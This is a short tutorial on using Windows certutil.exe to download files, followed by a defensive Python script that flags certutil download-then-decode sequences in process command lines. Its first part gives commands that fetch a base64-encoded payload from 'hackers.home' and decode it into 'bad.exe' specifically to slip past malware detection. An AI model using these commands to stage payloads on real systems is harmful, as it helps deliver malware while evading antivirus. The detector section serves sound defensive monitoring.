Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine.

This command downloads "file" from "http://<ip>" to the Windows machine:

certutil.exe -urlcache -split -f http://<ip>/file file

Depending on the file, it could be detected as malicious and then be blocked.

A possible solution may be using the method described in this post from https://www.bleepingcomputer.com.

The trick is to base64-encode the file before sending it.
Once received, the file just needs to be decoded to obtain the original file.

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
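
For defenders, the download-then-decode pair above shows up in process-creation command lines. The Python below is an added example, not part of the original post: it flags certutil URL downloads and correlates them with a later decode of the same file. The function names and sample command lines are constructed for illustration, and it assumes events come from one host in time order.

```python
import re
from ntpath import basename  # Windows path rules on any platform

TOKEN = re.compile(r'"[^"]*"|\S+')
OPTION = re.compile(r"^[-/]([A-Za-z]+)$")  # certutil accepts -opt and /opt
URL = re.compile(r"^(?:https?|ftp)://", re.I)

def classify(cmdline):
    """Return a dict describing a certutil download or decode, else None."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    # Matches on image name only; a renamed copy of the binary is not covered.
    if not tokens or basename(tokens[0]).lower() not in ("certutil", "certutil.exe"):
        return None
    opts = {m.group(1).lower() for t in tokens[1:] if (m := OPTION.match(t))}
    args = [t for t in tokens[1:] if not OPTION.match(t)]
    urls = [a for a in args if URL.match(a)]
    files = [a for a in args if not URL.match(a)]
    if "urlcache" in opts and urls:
        return {"kind": "download", "url": urls[0], "out": files[0] if files else None}
    if opts & {"decode", "decodehex"} and len(files) >= 2:
        return {"kind": "decode", "src": files[0], "dst": files[1]}
    return None

def find_staged_payloads(cmdlines):
    """Pair each decode with an earlier download that wrote the same file name."""
    downloaded, findings = {}, []
    for line in cmdlines:
        event = classify(line)
        if not event:
            continue
        if event["kind"] == "download" and event["out"]:
            downloaded[basename(event["out"]).lower()] = event["url"]
        elif event["kind"] == "decode":
            url = downloaded.get(basename(event["src"]).lower())
            if url:
                findings.append((url, event["src"], event["dst"]))
    return findings

# Constructed process-creation command lines (not real telemetry).
SAMPLE = [
    r'certutil.exe -urlcache -split -f "https://example.test/content.txt" C:\Temp\stage.txt',
    r'certutil.exe -hashfile C:\Temp\setup.msi SHA256',
    r'C:\Windows\System32\CertUtil.exe /decode c:\temp\STAGE.TXT C:\Temp\stage.exe',
]

if __name__ == "__main__":
    for finding in find_staged_payloads(SAMPLE):
        print("download-then-decode:", finding)
```

Files are matched by name only, so a copy or rename between the two steps breaks the correlation; the individual download and decode events are still returned by classify.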
